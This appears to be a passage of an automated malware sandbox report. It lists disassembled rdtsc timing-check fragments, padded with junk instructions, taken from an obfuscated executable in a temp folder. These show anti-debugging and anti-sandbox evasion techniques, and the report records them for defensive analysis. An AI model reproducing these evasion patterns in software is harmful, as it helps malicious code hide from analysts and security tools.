Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31AB3C second address: 31AB9F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 adc di, 7600h 0x0000000d push 00000000h 0x0000000f xor edi, 62AD5CCBh 0x00000015 push 00000000h 0x00000017 mov bx, 9500h 0x0000001b xchg eax, esi 0x0000001c pushad 0x0000001d jmp 00007F7FDD3F1878h 0x00000022 jo 00007F7FDD3F186Ch 0x00000028 jno 00007F7FDD3F1866h 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 pushad 0x00000032 jng 00007F7FDD3F1866h 0x00000038 jmp 00007F7FDD3F1873h 0x0000003d popad 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31AB9F second address: 31ABA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31BBAD second address: 31BBB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 312F15 second address: 312F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31CC3C second address: 31CC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31ED1B second address: 31ED1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31ED1F second address: 31ED37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 315583 second address: 3155A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007F7FDCFD22A4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007F7FDCFD2296h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 323A9E second address: 323AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3249B4 second address: 3249CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDCFD22A4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3249CD second address: 3249D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3249D3 second address: 3249D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 325B14 second address: 325B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDD3F186Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 325B25 second address: 325B29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 326B32 second address: 326B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 326B36 second address: 326B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31CD83 second address: 31CD87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31DE47 second address: 31DE4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31BE6A second address: 31BE9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7FDD3F1879h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31EF36 second address: 31EF60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F7FDCFD2296h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F7FDCFD22A3h 0x00000015 ja 00007F7FDCFD2296h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31DE4D second address: 31DEC0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7FDD3F186Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D19F2h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jo 00007F7FDD3F186Bh 0x00000020 pushad 0x00000021 movzx edi, di 0x00000024 popad 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c call 00007F7FDD3F1873h 0x00000031 mov dword ptr [ebp+122D2C2Bh], esi 0x00000037 pop edi 0x00000038 mov eax, dword ptr [ebp+122D0281h] 0x0000003e sub dword ptr [ebp+122D27D6h], esi 0x00000044 push FFFFFFFFh 0x00000046 mov bx, 738Fh 0x0000004a nop 0x0000004b jmp 00007F7FDD3F186Ch 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 327CA1 second address: 327CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31CE83 second address: 31CE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31DEC0 second address: 31DEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31DEC5 second address: 31DECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 316BEA second address: 316BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 322C70 second address: 322CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F7FDD3F1868h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov ebx, ecx 0x00000023 sbb bl, FFFFFFC4h 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov ebx, 0AF08114h 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov edi, dword ptr [ebp+122D3C19h] 0x0000003f mov eax, dword ptr [ebp+122D0BBDh] 0x00000045 mov dword ptr [ebp+122D1D25h], eax 0x0000004b push FFFFFFFFh 0x0000004d pushad 0x0000004e mov esi, dword ptr [ebp+122D205Ah] 0x00000054 sbb cx, 4B86h 0x00000059 popad 0x0000005a xor dword ptr [ebp+122D2B4Fh], eax 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 jns 00007F7FDD3F1866h 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 323C4D second address: 323CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122DBB9Eh], edi 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F7FDCFD2298h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D1D87h], ecx 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov dword ptr [ebp+122DBB9Eh], ecx 0x00000043 mov eax, dword ptr [ebp+122D06A1h] 0x00000049 or dword ptr [ebp+122D2235h], edi 0x0000004f push FFFFFFFFh 0x00000051 jmp 00007F7FDCFD22A7h 0x00000056 nop 0x00000057 jmp 00007F7FDCFD22A2h 0x0000005c push eax 0x0000005d je 00007F7FDCFD22A2h 0x00000063 jns 00007F7FDCFD229Ch 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 324B7A second address: 324B80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 325CD8 second address: 325CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7FDCFD2296h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 316BEE second address: 316BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2D7E8E second address: 2D7E9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007F7FDCFD2296h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 326D90 second address: 326DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F7FDD3F1879h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 322CE7 second address: 322CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 325CE7 second address: 325CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 316BF4 second address: 316BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F7FDCFD2296h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 322CEC second address: 322CF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 32A236 second address: 32A23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 32D824 second address: 32D828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33297C second address: 332982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 332982 second address: 3329A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7FDD3F1872h 0x0000000c js 00007F7FDD3F1866h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2C56D1 second address: 2C56D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2C56D7 second address: 2C56DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2C56DB second address: 2C56ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7FDCFD229Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2C56ED second address: 2C56F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3325BF second address: 3325D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7FDCFD2296h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 336844 second address: 3368C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jg 00007F7FDD3F1866h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 jo 00007F7FDD3F1868h 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 jnp 00007F7FDD3F186Ch 0x00000028 pushad 0x00000029 push ecx 0x0000002a pop ecx 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e mov eax, dword ptr [eax] 0x00000030 pushad 0x00000031 jo 00007F7FDD3F187Ch 0x00000037 jmp 00007F7FDD3F1876h 0x0000003c jmp 00007F7FDD3F1878h 0x00000041 popad 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3368C0 second address: 3368C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 327E51 second address: 327E77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7FDD3F186Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 327F06 second address: 327F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 327F0A second address: 327F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 32A41E second address: 32A4C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F7FDCFD2296h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e jmp 00007F7FDCFD22A6h 0x00000013 or eax, 7036AAF5h 0x00000019 popad 0x0000001a push dword ptr fs:[00000000h] 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F7FDCFD2298h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b mov edi, edx 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov eax, dword ptr [ebp+122D0EA9h] 0x0000004a or ebx, dword ptr [ebp+122D3C51h] 0x00000050 push FFFFFFFFh 0x00000052 push edx 0x00000053 call 00007F7FDCFD22A6h 0x00000058 mov dword ptr [ebp+122D1912h], eax 0x0000005e pop edi 0x0000005f pop edi 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F7FDCFD22A8h 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CCD8 second address: 33CCDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CE2F second address: 33CE73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7FDCFD22A9h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jmp 00007F7FDCFD22A7h 0x00000013 jmp 00007F7FDCFD229Ah 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CFD3 second address: 33CFDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CFDE second address: 33CFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CFE3 second address: 33CFE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CFE9 second address: 33CFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33CFED second address: 33CFF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33D15B second address: 33D15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33D15F second address: 33D163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33D163 second address: 33D169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33D169 second address: 33D1A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1873h 0x00000007 pushad 0x00000008 jmp 00007F7FDD3F1876h 0x0000000d jmp 00007F7FDD3F186Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33D5D5 second address: 33D5F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F7FDCFD229Ah 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 33D5F9 second address: 33D5FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 342E5C second address: 342E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 342E62 second address: 342E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 341E64 second address: 341E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDCFD22A8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 341E80 second address: 341E86 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 341E86 second address: 341E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 341E8C second address: 341EAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 341EAD second address: 341EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34231A second address: 34231F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34231F second address: 34232C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 ja 00007F7FDCFD2296h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 341903 second address: 341907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 342633 second address: 34263F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F7FDCFD2296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34263F second address: 342650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7FDD3F186Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 342650 second address: 34267B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7FDCFD229Bh 0x0000000b jmp 00007F7FDCFD22A8h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 342902 second address: 342906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 342906 second address: 34290A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3461F2 second address: 3461FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F4E1 second address: 30F4E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30F4E5 second address: 30F4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
